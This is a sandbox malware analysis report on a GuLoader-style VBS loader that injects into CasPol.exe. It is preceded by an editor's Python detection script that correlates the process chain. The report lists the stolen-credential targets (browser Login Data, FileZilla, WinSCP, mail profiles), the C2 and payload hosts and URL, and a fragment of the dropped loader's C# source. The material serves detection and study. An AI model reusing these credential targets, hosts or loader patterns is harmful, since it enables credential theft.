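The process chain above (wscript.exe spawning powershell.exe with a multi-kilobyte obfuscated command line, PowerShell invoking csc.exe on a .cmdline response file under AppData\Local\Temp, then starting CasPol.exe with no arguments as an injection host) is the part of this report a detection engineer can turn into rules. Each step also occurs legitimately (Add-Type compiles through csc.exe in exactly this way), so the example below correlates the hits along the parent chain instead of alerting on any single one. It is an added example by the editor, not part of the report or of any vendor rule set, and runs over constructed Sysmon Event ID 1-style records: CasPol's PID 5484 comes from the report, every other PID and the placeholder PowerShell command line are made up, and the benign Add-Type records at the end show that the compiler rule alone does not escalate.

```python
import ntpath
import re

LONG_CMDLINE = 1000  # assumption: chars; the sample's command line runs to several thousand
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
# CasPol.exe is the host in this report; the others are sibling .NET utilities
# that loaders use the same way (assumption: editor's list).
DOTNET_HOLLOW_HOSTS = {"caspol.exe", "regasm.exe", "regsvcs.exe", "installutil.exe", "aspnet_compiler.exe"}
TEMP_RESPONSE_FILE = re.compile(r'@"?[^"\s]*\\AppData\\Local\\Temp\\[^"\s]*\.cmdline', re.IGNORECASE)
FIRST_TOKEN = re.compile(r'^\s*(?:"[^"]*"|\S+)\s*(.*)$', re.DOTALL)

PS_IMAGE = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
CSC_IMAGE = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
# Constructed stand-in for the sample's obfuscated "$Biliate = ..." command line, similar in length.
OBFUSCATED_PS = PS_IMAGE + ' "$Biliate = """' + "LaABrdGedGa-StTDiyCopsteUn " * 80 + '"""'

# Constructed Sysmon Event ID 1-style records; only CasPol's PID 5484 is from the report.
EVENTS = [
    {"pid": 4100, "ppid": 900, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'"C:\Windows\System32\wscript.exe" "C:\Users\user\Desktop\SIEM_PO00938467648.vbs"'},
    {"pid": 4312, "ppid": 4100, "image": r"C:\Windows\System32\cmd.exe", "cmdline": r"CMD.EXE /c echo C:\Windows"},
    {"pid": 4520, "ppid": 4100, "image": PS_IMAGE, "cmdline": OBFUSCATED_PS},
    {"pid": 4788, "ppid": 4520, "image": CSC_IMAGE,
     "cmdline": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0j5ctfzr\0j5ctfzr.cmdline"'},
    {"pid": 5484, "ppid": 4520, "image": r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe",
     "cmdline": r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe"},
    # Benign control: an interactive shell running Add-Type, which also compiles from %TEMP%.
    {"pid": 6000, "ppid": 5900, "image": PS_IMAGE, "cmdline": r"powershell.exe -File C:\scripts\build.ps1"},
    {"pid": 6010, "ppid": 6000, "image": CSC_IMAGE,
     "cmdline": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\k2x9bq1f\k2x9bq1f.cmdline"'},
]


def base(image):
    """Lower-cased file name of a Windows image path (ntpath works on any OS)."""
    return ntpath.basename(image).lower()


def has_arguments(cmdline):
    """True when anything follows the (possibly quoted) image path."""
    m = FIRST_TOKEN.match(cmdline)
    return bool(m and m.group(1).strip())


def detect(events):
    """Evaluate per-process rules, then escalate hits whose parent is a flagged PowerShell."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []  # (rule, severity, pid)
    for ev in events:
        img = base(ev["image"])
        parent = by_pid.get(ev["ppid"])
        pimg = base(parent["image"]) if parent else ""
        if img == "powershell.exe" and pimg in SCRIPT_HOSTS and len(ev["cmdline"]) > LONG_CMDLINE:
            alerts.append(("script_host_long_powershell", "high", ev["pid"]))
        if img == "csc.exe" and TEMP_RESPONSE_FILE.search(ev["cmdline"]):
            alerts.append(("csc_compiles_from_temp", "medium", ev["pid"]))
        if img in DOTNET_HOLLOW_HOSTS and not has_arguments(ev["cmdline"]):
            alerts.append(("dotnet_utility_without_arguments", "medium", ev["pid"]))
    # Correlation: a compiler or argument-less .NET host whose parent is the
    # flagged PowerShell is the GuLoader-style chain seen in this report.
    flagged = {pid for rule, _, pid in alerts if rule == "script_host_long_powershell"}
    for rule, _, pid in list(alerts):
        if rule != "script_host_long_powershell" and by_pid[pid]["ppid"] in flagged:
            alerts.append(("dotnet_loader_chain", "critical", pid))
    return alerts


def summarize(alerts):
    """Rule name -> sorted list of PIDs that triggered it."""
    out = {}
    for rule, _, pid in alerts:
        out.setdefault(rule, []).append(pid)
    return {rule: sorted(pids) for rule, pids in out.items()}


if __name__ == "__main__":
    for rule, pids in summarize(detect(EVENTS)).items():
        print(f"{rule}: {pids}")
```

The benign csc.exe (PID 6010) still produces a medium "csc_compiles_from_temp" hit, which is the right outcome: that rule is a triage signal, and only its combination with a script-host-launched, oversized PowerShell parent is worth paging on.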
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Security\2.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_079DD7E4 CreateNamedPipeW,

            Stealing of Sensitive Information

Source: Yara match | File source: 0000000C.00000002.91118394619.000000001D920000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 5484, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: Yara match | File source: 0000000C.00000002.91118394619.000000001D920000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.91117300370.000000001D8D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 5484, type: MEMORYSTR

            Remote Access Functionality

Source: Yara match | File source: 0000000C.00000002.91118394619.000000001D920000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 5484, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 12_2_010E4A7A bind,
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 12_2_010E4A55 bind,
MITRE ATT&CK Matrix (numbers preceding a technique name are the counts shown in the report for that technique)

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | 211 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 2 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 1 Exfiltration Over Alternative Protocol | 2 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | 321 Scripting | Boot or Logon Initialization Scripts | 1 Access Token Manipulation | 1 Deobfuscate/Decode Files or Information | 1 Credentials in Registry | 115 System Information Discovery | Remote Desktop Protocol | 2 Data from Local System | Exfiltration Over Bluetooth | 11 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | 21 Command and Scripting Interpreter | Logon Script (Windows) | 12 Process Injection | 321 Scripting | Security Account Manager | 321 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | Automated Exfiltration | 1 Non-Standard Port | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | 1 PowerShell | Logon Script (Mac) | Logon Script (Mac) | 2 Obfuscated Files or Information | NTDS | 1 Process Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 2 Non-Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 241 Virtualization/Sandbox Evasion | SSH | Keylogging | Data Transfer Size Limits | 23 Application Layer Protocol | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 Masquerading | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | 241 Virtualization/Sandbox Evasion | DCSync | 1 System Network Configuration Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 1 Access Token Manipulation | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | 12 Process Injection | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
Behavior Graph ID: 756154 | Sample: SIEM_PO00938467648.vbs | Startdate: 29/11/2022 | Architecture: WINDOWS | Score: 100

Start (sample)
• DNS/IP: ftp.mcmprint.net; qwedft.gq; 2 other IPs or domains
• Signatures: Snort IDS alert for network traffic; Multi AV Scanner detection for domain / URL; Malicious sample detected (through community Yara rule); 10 other signatures
• started: wscript.exe (1 1)
    • Signatures: Wscript starts Powershell (via cmd or directly); Obfuscated command line found; Very long command line found
    • started: powershell.exe (25)
        • dropped: C:\Users\user\AppData\...\0j5ctfzr.cmdline, Unicode
        • Signatures: Tries to detect Any.run
        • started: CasPol.exe (15 12)
            • DNS/IP: ftp.mcmprint.net 185.31.121.136, 21, 49858, 49859, RAX-ASBG Bulgaria; qwedft.gq 162.240.62.179, 49855, 80, UNIFIEDLAYER-AS-1US United States; api.ipify.org.herokudns.com 52.20.78.240, 443, 49857, AMAZON-AESUS United States
            • Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Tries to steal Mail credentials (via file / registry access); 4 other signatures
        • started: csc.exe (3)
            • dropped: C:\Users\user\AppData\Local\...\0j5ctfzr.dll, PE32
            • started: cvtres.exe (1)
        • started: conhost.exe
    • started: cmd.exe (1)
        • started: conhost.exe

Source | Detection | Scanner | Label
SIEM_PO00938467648.vbs | 35% | ReversingLabs | Script-WScript.Trojan.GuLoader

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\0j5ctfzr\0j5ctfzr.dll | 100% | Joe Sandbox ML |

No Antivirus matches

Source | Detection | Scanner | Label
api.ipify.org.herokudns.com | 0% | Virustotal |
ftp.mcmprint.net | 10% | Virustotal |

Source | Detection | Scanner | Label
http://pesterbdd.com/images/Pester.png | 100% | Avira URL Cloud | malware
https://api.ipify.orgftp://ftp.mcmprint.netklogz | 0% | Avira URL Cloud | safe
http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe
http://qwedft.gq/Akkant/VUUby127.xsn | 0% | Avira URL Cloud | safe
http://kmbImL.com | 0% | Avira URL Cloud | safe
https://contoso.com/License | 0% | Avira URL Cloud | safe
https://contoso.com/ | 0% | Avira URL Cloud | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www | 0% | Avira URL Cloud | safe
http://DynDns.comDynDNSnamejidpasswordPsi/Psi | 0% | Avira URL Cloud | safe
https://contoso.com/Icon | 0% | Avira URL Cloud | safe
https://ZK1g7ahAv5q7aIVR.comXy | 0% | Avira URL Cloud | safe
https://ZK1g7ahAv5q7aIVR.com | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
api.ipify.org.herokudns.com | 52.20.78.240 | true | false | | unknown
qwedft.gq | 162.240.62.179 | true | false | | unknown
ftp.mcmprint.net | 185.31.121.136 | true | true | | unknown
api.ipify.org | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://api.ipify.org/ | false | | high
http://qwedft.gq/Akkant/VUUby127.xsn | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://kmbImL.com | CasPol.exe, 0000000C.00000002.91117300370.000000001D8D1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://127.0.0.1:HTTP/1.1 | CasPol.exe, 0000000C.00000002.91117300370.000000001D8D1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
http://nuget.org/NuGet.exe | powershell.exe, 00000006.00000002.86766294466.000000000534C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.ipify.org | CasPol.exe, 0000000C.00000002.91117300370.000000001D8D1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000006.00000002.86731242740.000000000443C000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://aka.ms/pscore6lB | powershell.exe, 00000006.00000002.86726548109.00000000042E1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000006.00000002.86731242740.000000000443C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.ipify.orgftp://ftp.mcmprint.netklogz | CasPol.exe, 0000000C.00000002.91117300370.000000001D8D1000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 00000006.00000002.86766294466.000000000534C000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000006.00000002.86766294466.000000000534C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000006.00000002.86766294466.000000000534C000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www | CasPol.exe, 0000000C.00000002.91117300370.000000001D8D1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://DynDns.comDynDNSnamejidpasswordPsi/Psi | CasPol.exe, 0000000C.00000002.91117300370.000000001D8D1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000006.00000002.86766294466.000000000534C000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000006.00000002.86726548109.00000000042E1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ZK1g7ahAv5q7aIVR.comXy | CasPol.exe, 0000000C.00000002.91118394619.000000001D920000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ZK1g7ahAv5q7aIVR.com | CasPol.exe, 0000000C.00000002.91118394619.000000001D920000.00000004.00000800.00020000.00000000.sdmp; CasPol.exe, 0000000C.00000003.86807185996.000000001C701000.00000004.00000020.00020000.00000000.sdmp; CasPol.exe, 0000000C.00000002.91121875644.000000001D9FD000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000006.00000002.86731242740.000000000443C000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
162.240.62.179 | qwedft.gq | United States | 46606 | UNIFIEDLAYER-AS-1US | false
52.20.78.240 | api.ipify.org.herokudns.com | United States | 14618 | AMAZON-AESUS | false
185.31.121.136 | ftp.mcmprint.net | Bulgaria | 199364 | RAX-ASBG | true
                                Joe Sandbox Version:36.0.0 Rainbow Opal
                                Analysis ID:756154
                                Start date and time:2022-11-29 18:31:34 +01:00
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 15m 6s
                                Hypervisor based Inspection enabled:false
                                Report type:light
                                Sample file name:SIEM_PO00938467648.vbs
                                Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301)
                                Run name:Suspected Instruction Hammering
Number of new started processes analysed:15
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.troj.spyw.expl.evad.winVBS@13/10@3/3
                                EGA Information:
                                • Successful, ratio: 100%
                                HDC Information:Failed
                                HCA Information:
                                • Successful, ratio: 99%
                                • Number of executed functions: 0
                                • Number of non-executed functions: 0
                                Cookbook Comments:
                                • Found application associated with file extension: .vbs
                                • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                • Exclude process from analysis (whitelisted): dllhost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe
                                • TCP Packets have been reduced to 100
                                • Excluded IPs from analysis (whitelisted): 20.190.159.0, 20.190.159.73, 40.126.31.71, 20.190.159.71, 20.190.159.68, 20.190.159.75, 20.190.159.2, 40.126.31.73
                                • Excluded domains from analysis (whitelisted): spclient.wg.spotify.com, wdcpalt.microsoft.com, client.wns.windows.com, prda.aadg.msidentity.com, login.live.com, ctldl.windowsupdate.com, wdcp.microsoft.com, login.msa.msidentity.com, www.tm.a.prd.aadg.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net
• Not all processes were analyzed, report is missing behavior information
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                No simulations
                                No context
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8003
                                Entropy (8bit):4.841989710132343
                                Encrypted:false
                                SSDEEP:192:Qxoe5GVsm5emddVFn3eGOVpN6K3bkkjo5dgkjDt4iWN3yBGHD9smqdcU6C5pOWik:7hVoGIpN6KQkj22kjh4iUxgrib4J
                                MD5:677C4E3A07935751EA3B092A5E23232F
                                SHA1:0BB391E66C6AE586907E9A8F1EE6CA114ACE02CD
                                SHA-256:D05D82E08469946C832D1493FA05D9E44926911DB96A89B76C2A32AC1CBC931F
                                SHA-512:253BCC6033980157395016038E22D3A49B0FA40AEE18CC852065423BEF773BF000EAAEB0809D0B9C4E167883288B05BA168AF0A756D6B74852778EAAA30055C2
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (1049), with no line terminators
                                Category:dropped
                                Size (bytes):1052
                                Entropy (8bit):4.997907941877808
                                Encrypted:false
                                SSDEEP:24:JVSgTlR8ZhIZFbamwTJI1ro8kkcw+n1csrsIuY:JVlTlR8DIZFbLwTJI1rb/P+n1BrsIX
                                MD5:5CB0DD0B77A3DA8C76FA25C6482E90D5
                                SHA1:309AAF2851C84D34E8C8FC38B102721126D3E145
                                SHA-256:4A5B247BE5F2AD1BF7CB3E184F7F687B5D59C7DE795FD1EAF69B7B0E2F4F716E
                                SHA-512:F4842683F2B44C5FE29A03CAC23BCE6358F2FFF9A4CD1232319591CB3A48834C95DC07DA3159584DE2AED4F0EBE9A7A517ED4676D38DC63B35BA405D5FA7BD19
                                Malicious:false
                                Preview:.using System;using System.Runtime.InteropServices;public static class Tueiron1 {[DllImport("user32")]public static extern int DestroyCaret();[DllImport("gdi32")]public static extern int ScaleWindowExtEx(int Drift,int Ambula,int Baso,int iagtta,int Vejmat158,int Mcgr);[DllImport("kernel32")]public static extern int HeapSize(int Prop,int Adres,int Tortri);[DllImport("shell32.dll")]public static extern void DragFinish(int Omdr);[DllImport("winmm.dll")]public static extern int mixerGetDevCaps(int Nitr,int Fel,int Afs93);[DllImport("kernel32")]public static extern int LockResource(int Lei);[DllImport("kernel32")]public static extern int VirtualAlloc(int v1,int v2,int v3,int v4);[DllImport("ADVAPI32.DLL")]public static extern void MapGenericMask(int Brink,int Midts);[DllImport("kernel32")]public static extern IntPtr EnumSystemLocalesW(uint v1,int v2);[DllImport("kernel32")]public static extern int SetThreadAffinityMask(int Rebuil,int Semis);[DllImport("user32")]public static extern int Se
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
                                Category:dropped
                                Size (bytes):371
                                Entropy (8bit):5.263514527807254
                                Encrypted:false
